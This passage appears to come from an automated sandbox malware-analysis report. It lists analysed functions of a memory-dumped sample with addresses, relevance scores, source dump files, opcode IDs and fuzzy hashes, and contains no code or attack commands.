                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: UNC\
                              • API String ID: 0-505053535
                              • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction ID: 6bba45419465814afec65266fad06965b17b5da141346fe8a669809654e32c0f
                              • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction Fuzzy Hash: 89E11671D042758EEF10CF18D8867BEBFE2BF97318F198169C4A46B2D2C73599468B90
                              Function 008764EC Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8Up
                              • API String ID: 0-3899141458
                              • Opcode ID: 9703654c58a6c31b80eae9d5dea8642b88e566d1a5ec7ee4c96f6f58c0dc6396
                              • Instruction ID: 4bd60ae256c5e19ee00384cd828cee80af5b946da40eee3742f55e5a550f3ca6
                              • Opcode Fuzzy Hash: 9703654c58a6c31b80eae9d5dea8642b88e566d1a5ec7ee4c96f6f58c0dc6396
                              • Instruction Fuzzy Hash: D4715AF3A083145BE3186D3DEC8577BBBDAEBD4320F16463DDE8493781E97A48054286
                              Function 0082DB73 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .WeG
                              • API String ID: 0-4167595253
                              • Opcode ID: bb204fcd1639b2e80245576e23b44c03f7d3022d286483273257091025c9a22e
                              • Instruction ID: c371452e2efc927bfc6791cf42b2aa5b48cf7a35b29b0e88321419e74029b71b
                              • Opcode Fuzzy Hash: bb204fcd1639b2e80245576e23b44c03f7d3022d286483273257091025c9a22e
                              • Instruction Fuzzy Hash: 314126B3A046006BF3049929DC4577BB7E69FD8330F2AC63DA698D3784E5799C058296
                              Function 004EE544 Relevance: .8, Instructions: 823COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                              • Instruction ID: 97012c10e0fc407ef06887de0475756721562da7c4e95c66f7e3d9254dc8c28c
                              • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                              • Instruction Fuzzy Hash: C782E075900F448FD765CF2AC8807A2B7E1BF9A300F548A2ED9EA87751DB34B945CB50
                              Function 00508E78 Relevance: .6, Instructions: 649COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                              • Instruction ID: 65ef96a8725fd827292f66b909b952c908f7b4f26aeb0627dbf769edc1979d81
                              • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                              • Instruction Fuzzy Hash: 9842AE706047418FC725CF19C49466AFFE2BF99310F288A6ED4868B7DBD636E885CB50
                              Function 0053AC28 Relevance: .5, Instructions: 501COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                              • Instruction ID: 1e02b4c8540ecdc42c114c4542195805e691962891bba747b055eb405bd248da
                              • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                              • Instruction Fuzzy Hash: FD02F571E0021A8FDB11CF79C8806AFBBE6BFDA344F15872AE855B7251D770AD428790
                              Function 005198B8 Relevance: .5, Instructions: 482COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                              • Instruction ID: 81864724ddacabb6a3d4fcbbfe5597953e5014b1fbb171a7c1967bffd9bc5591
                              • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                              • Instruction Fuzzy Hash: 0D02F174A083058FEB15DF29D8906A9BBE1BFA5310F148B2DE8999B352D731ECC58B41
                              Function 005066C8 Relevance: .4, Instructions: 418COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                              • Instruction ID: 743cc19f0c0177615394b6356f06808a011eabd38d76759cd7fe1121da2e49e4
                              • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                              • Instruction Fuzzy Hash: 48F16BB260C6914BC71D9A1484B08BD7FD2AFA9201F0E85ADFDD70F393D924DA05DB51
                              Function 0054B308 Relevance: .4, Instructions: 415COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                              • Instruction ID: b3a9b9afc54d7571965182cd9e0513208e15fa7b89553af74c67f86b3640dee5
                              • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                              • Instruction Fuzzy Hash: D2D17473F10A254BFB08CA99DC923EDB6E2EBD8354F19413ED916E7381D6B89D018790
                              Function 00530B88 Relevance: .4, Instructions: 378COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                              • Instruction ID: e26d7077998afdff6303b5997f35c7c0a30967f691993764436be08fdbead17d
                              • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                              • Instruction Fuzzy Hash: 70D1C272E007198BDF24CFA8C8947EEBBB2BF89310F149229E955A72D1D7345D46CB50
                              Function 0051B8A8 Relevance: .4, Instructions: 376COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                              • Instruction ID: 56614249108c36731454ad164d0cb9493d0ba8a2c7c4078720416128a340c0b8
                              • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                              • Instruction Fuzzy Hash: 0B027974E046598FCF26CFA8C4905EDBBB6FF8D310F548159E889AB355C730AA91CB90
                              Function 0051BD68 Relevance: .4, Instructions: 372COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                              • Instruction ID: f9b3dac290c55214abf4a8912bd55531bc48ca3b92085aeb7bffff428b05c553
                              • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                              • Instruction Fuzzy Hash: B4020275E00619DFCF15CF98C4809ADBBB6FF88350F258569E809AB351D731AA91CF90
